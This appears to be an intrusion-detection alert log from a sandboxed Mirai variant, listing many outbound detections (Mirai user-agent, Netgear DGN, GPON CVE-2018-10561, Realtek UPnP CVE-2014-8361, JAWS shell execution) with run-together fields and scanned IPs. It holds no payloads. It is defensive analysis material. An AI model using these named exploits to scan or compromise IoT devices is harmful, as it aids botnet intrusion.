                                                              2024-12-11T00:43:29.287955+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23480069.104.175.1985555TCP
                                                              2024-12-11T00:43:29.290124+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2343962166.143.49.2197574TCP
                                                              2024-12-11T00:43:29.303168+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2348456192.181.205.1508080TCP
                                                              2024-12-11T00:43:29.312923+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.235699832.247.7.1588080TCP
                                                              2024-12-11T00:43:29.318746+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2340162205.6.203.1335555TCP
                                                              2024-12-11T00:43:29.328572+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2343506148.56.202.1780TCP
                                                              2024-12-11T00:43:29.331118+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233289028.73.69.7049152TCP
                                                              2024-12-11T00:43:29.337305+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235710096.141.159.1018080TCP
                                                              2024-12-11T00:43:29.339514+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2334954150.213.241.2018080TCP
                                                              2024-12-11T00:43:29.343519+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.234369017.99.132.438080TCP
                                                              2024-12-11T00:43:29.349725+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2357176136.96.254.1548080TCP
                                                              2024-12-11T00:43:29.355896+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2340894138.164.52.4149152TCP
                                                              2024-12-11T00:43:29.366169+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2337160126.148.68.485555TCP
                                                              2024-12-11T00:43:29.375265+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2350662114.65.149.15480TCP
                                                              2024-12-11T00:43:29.380712+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235047467.84.206.985555TCP
                                                              2024-12-11T00:43:29.385082+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2349524201.192.233.880TCP
                                                              2024-12-11T00:43:29.387270+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2352562209.205.122.13849152TCP
                                                              2024-12-11T00:43:29.390549+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235451478.94.137.1025555TCP
                                                              2024-12-11T00:43:29.431107+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.234085623.210.109.408080TCP
                                                              2024-12-11T00:43:29.431617+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2339800205.55.79.2368080TCP
                                                              2024-12-11T00:43:29.432231+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.235295634.155.65.1928080TCP
                                                              2024-12-11T00:43:29.432529+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2356000156.9.96.4380TCP
                                                              2024-12-11T00:43:29.433189+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2356766148.104.170.2098080TCP
                                                              2024-12-11T00:43:29.433195+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2357392168.22.178.1618080TCP
                                                              2024-12-11T00:43:29.434543+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2353262137.77.114.15680TCP
                                                              2024-12-11T00:43:29.460925+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2346760103.136.18.24180TCP
                                                              2024-12-11T00:43:29.461525+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2340464174.191.244.58080TCP
                                                              2024-12-11T00:43:29.462247+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.234049048.76.49.7380TCP
                                                              2024-12-11T00:43:29.539563+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2356064131.11.250.528080TCP
                                                              2024-12-11T00:43:29.539830+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2338914179.129.124.128080TCP
                                                              2024-12-11T00:43:29.540246+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2360010198.111.45.20380TCP
                                                              2024-12-11T00:43:29.540823+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2353700129.114.47.18780TCP
                                                              2024-12-11T00:43:29.541031+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2334116174.193.104.21780TCP
                                                              2024-12-11T00:43:29.541319+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2353702120.95.235.7180TCP
                                                              2024-12-11T00:43:29.542294+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2353116105.183.55.2128080TCP
                                                              2024-12-11T00:43:29.542301+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2353960117.138.201.2338080TCP
                                                              2024-12-11T00:43:29.542657+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.233995476.56.4.878080TCP
                                                              2024-12-11T00:43:29.555034+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2334660175.193.203.4880TCP
                                                              2024-12-11T00:43:29.555045+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2338126113.43.66.28080TCP
                                                              2024-12-11T00:43:29.555834+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.236022084.227.113.19380TCP
                                                              2024-12-11T00:43:29.556229+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2337266209.30.237.25180TCP
                                                              2024-12-11T00:43:29.570843+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.233733264.90.223.11680TCP
                                                              2024-12-11T00:43:29.572159+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.235879851.82.89.20680TCP
                                                              2024-12-11T00:43:29.572595+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.235695634.70.187.1288080TCP
                                                              2024-12-11T00:43:29.573469+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2345748175.171.254.3780TCP
                                                              2024-12-11T00:43:29.573566+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2352688137.242.182.1948080TCP
                                                              2024-12-11T00:43:29.574483+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.234716269.214.87.24180TCP
                                                              2024-12-11T00:43:29.576129+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2337822177.122.6.738080TCP
                                                              2024-12-11T00:43:29.576905+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2352762115.50.227.1658080TCP
                                                              2024-12-11T00:43:29.577437+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.234888293.215.216.10680TCP
                                                              2024-12-11T00:43:29.577850+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.235295649.74.230.1508080TCP
                                                              2024-12-11T00:43:29.578146+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2356034219.203.86.23680TCP
                                                              2024-12-11T00:43:29.578785+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.235763619.148.27.1628080TCP
                                                              2024-12-11T00:43:29.579170+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2357576141.74.31.8680TCP
                                                              2024-12-11T00:43:29.579600+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2359710176.129.63.1748080TCP
                                                              2024-12-11T00:43:29.579790+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.234490238.94.214.1048080TCP
                                                              2024-12-11T00:43:29.580477+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.234072888.238.152.1258080TCP
                                                              2024-12-11T00:43:29.580971+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.235718890.16.121.1478080TCP
                                                              2024-12-11T00:43:29.581167+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2360546191.152.135.2018080TCP
                                                              2024-12-11T00:43:29.582604+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.23377584.33.109.1238080TCP
                                                              2024-12-11T00:43:29.583343+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2349966138.136.138.16580TCP
                                                              2024-12-11T00:43:29.583538+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2359308202.99.95.20580TCP
                                                              2024-12-11T00:43:29.584700+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2348968152.230.216.2080TCP
                                                              2024-12-11T00:43:29.587865+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2349482185.7.165.10080TCP
                                                              2024-12-11T00:43:29.587989+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2358272110.93.67.4780TCP
                                                              2024-12-11T00:43:29.588893+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.233749850.241.123.1280TCP
                                                              2024-12-11T00:43:29.589034+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2340984143.26.169.10380TCP
                                                              2024-12-11T00:43:29.589428+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2338326168.135.70.17080TCP
                                                              2024-12-11T00:43:29.589707+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.233678881.14.183.2298080TCP
                                                              2024-12-11T00:43:29.590760+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2340484218.127.6.16380TCP
                                                              2024-12-11T00:43:29.664273+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2348332172.201.78.23080TCP
                                                              2024-12-11T00:43:29.664363+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.233763475.88.145.14780TCP
                                                              2024-12-11T00:43:29.664637+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2350746117.194.49.1278080TCP
                                                              2024-12-11T00:43:30.286826+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2332932144.217.176.1748080TCP
                                                              2024-12-11T00:43:30.294099+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2358340222.201.49.848080TCP
                                                              2024-12-11T00:43:30.298445+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234844419.230.61.21280TCP
                                                              2024-12-11T00:43:30.298777+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2350092141.55.34.2180TCP
                                                              2024-12-11T00:43:30.304589+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2351602157.105.171.22552869TCP
                                                              2024-12-11T00:43:30.304956+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2336858142.20.61.2380TCP
                                                              2024-12-11T00:43:30.311496+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2337960109.175.199.2335555TCP
                                                              2024-12-11T00:43:30.326056+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2340274133.90.64.1565555TCP
                                                              2024-12-11T00:43:30.326419+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2333902168.58.175.24949152TCP
                                                              2024-12-11T00:43:30.330777+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2351794220.17.242.11149152TCP
                                                              2024-12-11T00:43:30.331876+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.235419889.17.140.798080TCP
                                                              2024-12-11T00:43:30.341320+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2344918128.41.167.688080TCP
                                                              2024-12-11T00:43:30.342053+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2343336101.211.79.465555TCP
                                                              2024-12-11T00:43:30.342773+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.233408880.34.249.13452869TCP
                                                              2024-12-11T00:43:30.352588+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235646618.90.81.3180TCP
                                                              2024-12-11T00:43:30.352588+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235646618.90.81.3180TCP
                                                              2024-12-11T00:43:30.360209+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2342714218.167.23.1757574TCP
                                                              2024-12-11T00:43:30.360582+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234253277.187.207.827574TCP
                                                              2024-12-11T00:43:30.360951+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235399051.202.61.13349152TCP
                                                              2024-12-11T00:43:30.373282+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.234083016.63.102.2438080TCP
                                                              2024-12-11T00:43:30.373637+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2337984173.227.189.9580TCP
                                                              2024-12-11T00:43:30.374380+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234752457.237.49.2258080TCP
                                                              2024-12-11T00:43:30.383463+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.236002896.203.220.25249152TCP
                                                              2024-12-11T00:43:31.332665+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2334872136.74.73.2077574TCP
                                                              2024-12-11T00:43:31.348349+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2340240219.82.14.20980TCP
                                                              2024-12-11T00:43:31.378066+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2335546179.33.8.258080TCP
                                                              2024-12-11T00:43:31.379169+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.234959667.144.133.1558080TCP
                                                              2024-12-11T00:43:32.286165+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.233908461.15.27.22580TCP
                                                              2024-12-11T00:43:32.286506+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233863027.124.53.20380TCP
                                                              2024-12-11T00:43:32.287246+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2349854134.249.173.6880TCP
                                                              2024-12-11T00:43:32.287246+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2349854134.249.173.6880TCP
                                                              2024-12-11T00:43:32.296335+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2343758177.26.75.2187574TCP
                                                              2024-12-11T00:43:32.305936+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2339230157.15.102.4480TCP
                                                              2024-12-11T00:43:32.306680+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2347524192.226.130.115555TCP
                                                              2024-12-11T00:43:32.319438+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234459274.188.6.778080TCP
                                                              2024-12-11T00:43:32.319814+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2360620215.230.190.2168080TCP
                                                              2024-12-11T00:43:32.320188+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.234410498.140.251.2008080TCP
                                                              2024-12-11T00:43:32.329721+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2355802148.77.189.21452869TCP
                                                              2024-12-11T00:43:32.338505+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2349252113.108.229.9380TCP
                                                              2024-12-11T00:43:32.338505+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2349252113.108.229.9380TCP
                                                              2024-12-11T00:43:32.339280+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2356578183.204.170.5780TCP
                                                              2024-12-11T00:43:32.339280+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2356578183.204.170.5780TCP
                                                              2024-12-11T00:43:32.351012+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233357049.66.23.14480TCP
                                                              2024-12-11T00:43:32.351012+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233357049.66.23.14480TCP
                                                              2024-12-11T00:43:32.351402+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.234591426.89.112.14580TCP
                                                              2024-12-11T00:43:32.358030+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2350342146.143.228.515555TCP
                                                              2024-12-11T00:43:32.359160+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234150697.115.167.16449152TCP
                                                              2024-12-11T00:43:32.363542+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2334420156.188.135.4680TCP
                                                              2024-12-11T00:43:32.363542+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2334420156.188.135.4680TCP
                                                              2024-12-11T00:43:32.368626+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2354904182.58.157.7852869TCP
                                                              2024-12-11T00:43:32.369004+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2344984102.138.252.1225555TCP
                                                              2024-12-11T00:43:32.378806+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.235104450.138.173.2448080TCP
                                                              2024-12-11T00:43:32.379176+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2354690195.50.11.6080TCP
                                                              2024-12-11T00:43:32.383920+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235510841.51.205.487574TCP
                                                              2024-12-11T00:43:32.389077+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23561643.50.46.1768080TCP
                                                              2024-12-11T00:43:32.389441+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2336458101.115.94.17780TCP
                                                              2024-12-11T00:43:32.695756+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2347720187.43.112.1580TCP
                                                              2024-12-11T00:43:33.296758+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235873253.86.41.9980TCP
                                                              2024-12-11T00:43:34.046286+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2343100203.183.165.16049152TCP
                                                              2024-12-11T00:43:36.283420+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234142276.225.145.13280TCP
                                                              2024-12-11T00:43:36.283420+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234142276.225.145.13280TCP
                                                              2024-12-11T00:43:36.283702+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2341852173.143.115.2780TCP
                                                              2024-12-11T00:43:36.283702+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2341852173.143.115.2780TCP
                                                              2024-12-11T00:43:36.285542+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2340520147.230.138.10580TCP
                                                              2024-12-11T00:43:36.285542+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2340520147.230.138.10580TCP
                                                              2024-12-11T00:43:36.285913+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2348384103.83.208.9349152TCP
                                                              2024-12-11T00:43:36.286284+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233796666.158.237.4780TCP
                                                              2024-12-11T00:43:36.286284+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233796666.158.237.4780TCP
                                                              2024-12-11T00:43:36.287035+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2348608194.65.247.2315555TCP
                                                              2024-12-11T00:43:36.287404+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235534268.206.127.407574TCP
                                                              2024-12-11T00:43:36.289259+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233462434.49.97.2158080TCP
                                                              2024-12-11T00:43:36.301326+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2334218177.17.55.15080TCP
                                                              2024-12-11T00:43:36.307248+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235864639.61.64.13880TCP
                                                              2024-12-11T00:43:36.316600+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2338192209.97.96.8780TCP
                                                              2024-12-11T00:43:36.316600+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2338192209.97.96.8780TCP
                                                              2024-12-11T00:43:36.323900+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.236082220.39.219.198080TCP
                                                              2024-12-11T00:43:36.340706+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2355656115.15.94.5180TCP
                                                              2024-12-11T00:43:36.357172+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2360762104.238.195.2255555TCP
                                                              2024-12-11T00:43:36.375429+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.235879457.103.185.1248080TCP
                                                              2024-12-11T00:43:36.389181+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2359720104.87.39.738080TCP
                                                              2024-12-11T00:43:37.285402+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2354796101.152.156.1957574TCP
                                                              2024-12-11T00:43:37.288733+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2356600177.244.168.8280TCP
                                                              2024-12-11T00:43:37.289470+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2354140217.111.105.127574TCP
                                                              2024-12-11T00:43:37.289817+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.235399055.235.209.20652869TCP
                                                              2024-12-11T00:43:37.290931+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.233564230.28.21.16380TCP
                                                              2024-12-11T00:43:37.316740+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2351528172.218.152.1098080TCP
                                                              2024-12-11T00:43:37.317804+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.23484426.128.71.14152869TCP
                                                              2024-12-11T00:43:37.343266+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2334694157.191.130.6449152TCP
                                                              2024-12-11T00:43:37.344005+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2346440151.75.41.07574TCP
                                                              2024-12-11T00:43:37.364713+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.23349689.177.77.21680TCP
                                                              2024-12-11T00:43:37.365448+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2335058198.54.10.705555TCP
                                                              2024-12-11T00:43:37.374174+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233284416.222.179.12380TCP
                                                              2024-12-11T00:43:37.374549+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2353286196.101.145.1980TCP
                                                              2024-12-11T00:43:37.374549+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2353286196.101.145.1980TCP
                                                              2024-12-11T00:43:38.153731+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2343784220.84.90.2257574TCP
                                                              2024-12-11T00:43:39.287559+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2334648214.40.211.2087574TCP
                                                              2024-12-11T00:43:39.287933+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235553475.89.54.1727574TCP
                                                              2024-12-11T00:43:39.288300+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2339426175.74.235.21780TCP
                                                              2024-12-11T00:43:39.295216+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2353758179.118.33.8080TCP
                                                              2024-12-11T00:43:39.322912+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235466660.224.26.528080TCP
                                                              2024-12-11T00:43:39.323667+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235118080.111.198.13649152TCP
                                                              2024-12-11T00:43:39.325523+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2349922150.93.111.2128080TCP
                                                              2024-12-11T00:43:39.342382+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2334580147.254.211.16552869TCP
                                                              2024-12-11T00:43:39.347184+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234105072.239.95.1888080TCP
                                                              2024-12-11T00:43:39.347575+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2349386120.56.66.3180TCP
                                                              2024-12-11T00:43:39.365108+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234514018.76.225.25480TCP
                                                              2024-12-11T00:43:39.365479+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2357288149.214.125.24849152TCP
                                                              2024-12-11T00:43:39.375723+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23353208.91.128.747574TCP
                                                              2024-12-11T00:43:39.429832+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.235438653.210.10.23480TCP
                                                              2024-12-11T00:43:39.429985+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2334596111.78.72.4080TCP
                                                              2024-12-11T00:43:39.461046+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2337210169.79.111.2508080TCP
                                                              2024-12-11T00:43:39.461424+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2336760121.246.12.21080TCP
                                                              2024-12-11T00:43:40.284073+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2359532151.71.55.8980TCP
                                                              2024-12-11T00:43:40.304768+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2338120215.143.219.2548080TCP
                                                              2024-12-11T00:43:40.323995+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2337322137.128.167.608080TCP
                                                              2024-12-11T00:43:40.332305+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2358964192.187.71.24780TCP
                                                              2024-12-11T00:43:40.336299+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233277271.6.68.1680TCP
